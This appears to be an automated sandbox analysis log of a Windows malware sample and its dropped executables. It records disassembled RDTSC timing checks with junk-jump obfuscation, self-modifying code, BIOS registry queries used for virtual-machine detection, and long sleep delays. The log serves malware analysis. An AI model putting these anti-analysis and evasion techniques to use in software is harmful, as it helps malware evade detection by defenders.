Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B0036C second address: 4B003EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [778165FCh] 0x0000000e pushad 0x0000000f jmp 00007F4B9132D69Ch 0x00000014 mov ch, 49h 0x00000016 popad 0x00000017 test eax, eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4B9132D6A3h 0x00000020 sub ecx, 5D44217Eh 0x00000026 jmp 00007F4B9132D6A9h 0x0000002b popfd 0x0000002c mov ah, 0Fh 0x0000002e popad 0x0000002f je 00007F4C03FC0C2Ch 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov ecx, 3AFE19DBh 0x0000003d jmp 00007F4B9132D6A0h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B003EF second address: 4B004B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b pushad 0x0000000c pushad 0x0000000d mov eax, 2153F86Dh 0x00000012 mov bx, si 0x00000015 popad 0x00000016 popad 0x00000017 xor eax, dword ptr [ebp+08h] 0x0000001a jmp 00007F4B90BE6235h 0x0000001f and ecx, 1Fh 0x00000022 pushad 0x00000023 call 00007F4B90BE622Ch 0x00000028 push ecx 0x00000029 pop edx 0x0000002a pop ecx 0x0000002b mov ch, dh 0x0000002d popad 0x0000002e ror eax, cl 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F4B90BE6234h 0x00000037 xor al, FFFFFFC8h 0x0000003a jmp 00007F4B90BE622Bh 0x0000003f popfd 0x00000040 mov edx, eax 0x00000042 popad 0x00000043 leave 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F4B90BE6237h 0x0000004d sub ecx, 368571BEh 0x00000053 jmp 00007F4B90BE6239h 0x00000058 popfd 0x00000059 jmp 00007F4B90BE6230h 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B0057B second address: 4B005E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e mov esi, 4396BE2Fh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4B9132D6A7h 0x0000001f add esi, 4127716Eh 0x00000025 jmp 00007F4B9132D6A9h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B005E1 second address: 4B005E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B005E7 second address: 4B005EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0029 second address: 4AB0086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5689C926h 0x00000008 mov ebx, 7B3951B2h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebp 0x00000011 pushad 0x00000012 pushad 0x00000013 call 00007F4B90BE6232h 0x00000018 pop ecx 0x00000019 pushfd 0x0000001a jmp 00007F4B90BE622Bh 0x0000001f adc esi, 46EDAC5Eh 0x00000025 jmp 00007F4B90BE6239h 0x0000002a popfd 0x0000002b popad 0x0000002c popad 0x0000002d mov dword ptr [esp], ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0086 second address: 4AB008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB008A second address: 4AB00A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6232h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB00A0 second address: 4AB00DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 jmp 00007F4B9132D69Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov bl, al 0x00000013 mov cx, dx 0x00000016 popad 0x00000017 and esp, FFFFFFF8h 0x0000001a pushad 0x0000001b movsx edi, si 0x0000001e movzx ecx, di 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F4B9132D69Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB00DC second address: 4AB00F0 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b mov dword ptr [esp], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB00F0 second address: 4AB00F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB00F4 second address: 4AB00FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB00FA second address: 4AB0100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0100 second address: 4AB0104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0104 second address: 4AB015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4B9132D6A0h 0x0000000e mov dword ptr [esp], ebx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4B9132D69Eh 0x00000018 adc eax, 57856908h 0x0000001e jmp 00007F4B9132D69Bh 0x00000023 popfd 0x00000024 mov bx, ax 0x00000027 popad 0x00000028 mov ebx, dword ptr [ebp+10h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F4B9132D6A1h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB015C second address: 4AB0182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6231h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bh, al 0x0000000d mov ebx, 78521FDCh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov bx, cx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0182 second address: 4AB01B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushfd 0x00000009 jmp 00007F4B9132D6A6h 0x0000000e add si, 6028h 0x00000013 jmp 00007F4B9132D69Bh 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB01B2 second address: 4AB01EE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4B90BE6238h 0x00000008 adc eax, 2F7C1288h 0x0000000e jmp 00007F4B90BE622Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edi, 224486F6h 0x00000020 mov dl, 1Ch 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB01EE second address: 4AB0214 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0214 second address: 4AB0218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0218 second address: 4AB022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB022B second address: 4AB0265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4B90BE6238h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0265 second address: 4AB0274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0274 second address: 4AB0300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ah, bl 0x0000000d pushad 0x0000000e mov dx, cx 0x00000011 movzx esi, bx 0x00000014 popad 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 jmp 00007F4B90BE622Dh 0x0000001c test esi, esi 0x0000001e pushad 0x0000001f push ecx 0x00000020 jmp 00007F4B90BE6233h 0x00000025 pop esi 0x00000026 pushfd 0x00000027 jmp 00007F4B90BE6239h 0x0000002c xor al, FFFFFF96h 0x0000002f jmp 00007F4B90BE6231h 0x00000034 popfd 0x00000035 popad 0x00000036 je 00007F4C038C4547h 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0300 second address: 4AB0306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0306 second address: 4AB030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB030C second address: 4AB0310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0310 second address: 4AB0342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4B90BE6237h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0342 second address: 4AB03D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C0400B962h 0x0000000f jmp 00007F4B9132D69Eh 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F4B9132D69Eh 0x0000001e jmp 00007F4B9132D6A5h 0x00000023 popfd 0x00000024 movzx ecx, bx 0x00000027 popad 0x00000028 or edx, dword ptr [ebp+0Ch] 0x0000002b jmp 00007F4B9132D6A3h 0x00000030 test edx, 61000000h 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 call 00007F4B9132D6A2h 0x0000003e pop eax 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB03D2 second address: 4AB0411 instructions: 0x00000000 rdtsc 0x00000002 call 00007F4B90BE622Bh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, edi 0x0000000c popad 0x0000000d jne 00007F4C038C44C9h 0x00000013 pushad 0x00000014 mov si, dx 0x00000017 mov edi, 2E5383E0h 0x0000001c popad 0x0000001d test byte ptr [esi+48h], 00000001h 0x00000021 pushad 0x00000022 call 00007F4B90BE6235h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0411 second address: 4AB045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F4B9132D6A7h 0x0000000b and ch, 0000006Eh 0x0000000e jmp 00007F4B9132D6A9h 0x00000013 popfd 0x00000014 popad 0x00000015 jne 00007F4C0400B8EBh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov si, di 0x00000021 mov di, 6FDAh 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB045D second address: 4AB0463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0463 second address: 4AB0474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0474 second address: 4AB0478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0478 second address: 4AB047C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB047C second address: 4AB0482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0843 second address: 4AA08A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4B9132D6A2h 0x0000000f sub cl, FFFFFFD8h 0x00000012 jmp 00007F4B9132D69Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007F4B9132D6A6h 0x00000020 and esp, FFFFFFF8h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4B9132D69Ah 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08A1 second address: 4AA08A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08A5 second address: 4AA08AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08AB second address: 4AA08B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08B1 second address: 4AA08B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08B5 second address: 4AA08DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov cx, F4E3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08DB second address: 4AA0917 instructions: 0x00000000 rdtsc 0x00000002 mov ax, FC3Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F4B9132D6A4h 0x0000000d mov bx, si 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4B9132D6A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0917 second address: 4AA091D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA091D second address: 4AA095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007F4B9132D6A9h 0x0000000c add ecx, 1940E2A6h 0x00000012 jmp 00007F4B9132D6A1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA095E second address: 4AA0985 instructions: 0x00000000 rdtsc 0x00000002 mov dl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, 32E0E848h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4B90BE6236h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0985 second address: 4AA0989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0989 second address: 4AA098F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA098F second address: 4AA09A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D69Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA09A0 second address: 4AA09A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA09A4 second address: 4AA0A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007F4B9132D69Dh 0x00000010 mov esi, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F4B9132D69Ch 0x0000001a adc ax, D838h 0x0000001f jmp 00007F4B9132D69Bh 0x00000024 popfd 0x00000025 call 00007F4B9132D6A8h 0x0000002a mov ecx, 05F42AF1h 0x0000002f pop eax 0x00000030 popad 0x00000031 mov ebx, 00000000h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0A08 second address: 4AA0A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0A0C second address: 4AA0A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0A12 second address: 4AA0A78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 pushfd 0x00000006 jmp 00007F4B90BE6238h 0x0000000b add ax, 1428h 0x00000010 jmp 00007F4B90BE622Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F4B90BE622Bh 0x00000024 add ch, 0000006Eh 0x00000027 jmp 00007F4B90BE6239h 0x0000002c popfd 0x0000002d mov eax, 6B2EDEF7h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0A78 second address: 4AA0AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C04012F9Bh 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 mov cx, F8DFh 0x00000017 popad 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f pushad 0x00000020 mov ecx, 3D9724D7h 0x00000025 pushad 0x00000026 call 00007F4B9132D69Ah 0x0000002b pop eax 0x0000002c mov di, B706h 0x00000030 popad 0x00000031 popad 0x00000032 mov ecx, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F4B9132D6A8h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0AD3 second address: 4AA0B13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C038CBAE7h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F4B90BE6234h 0x00000016 and si, 7008h 0x0000001b jmp 00007F4B90BE622Bh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E0EA47 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E0EB15 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FB83B6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E0EA41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E1EA47 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E1EB15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FC83B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E1EA41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Special instruction interceptor: First address: 461BBB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Special instruction interceptor: First address: 461BEF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Special instruction interceptor: First address: 605912 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Special instruction interceptor: First address: 68E8FC instructions caused by: Self-modifying code
Source: C:\Users\user\1000015002\b74664dd7e.exe Special instruction interceptor: First address: 7A1BBB instructions caused by: Self-modifying code
Source: C:\Users\user\1000015002\b74664dd7e.exe Special instruction interceptor: First address: 7A1BEF instructions caused by: Self-modifying code
Source: C:\Users\user\1000015002\b74664dd7e.exe Special instruction interceptor: First address: 945912 instructions caused by: Self-modifying code
Source: C:\Users\user\1000015002\b74664dd7e.exe Special instruction interceptor: First address: 9CE8FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Special instruction interceptor: First address: 14E9BE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Special instruction interceptor: First address: 30EBAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Special instruction interceptor: First address: 2F0FAB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Special instruction interceptor: First address: 373F69 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 75E9BE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 91EBAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 900FAB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 983F69 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: C30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: 2770000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: 26A0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 1400000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 3010000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2E40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_04B20892 rdtsc 6_2_04B20892
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 4229
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 4245
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 8501
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Window / User API: threadDelayed 5856
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1181
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1165
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1156
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 392
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1141
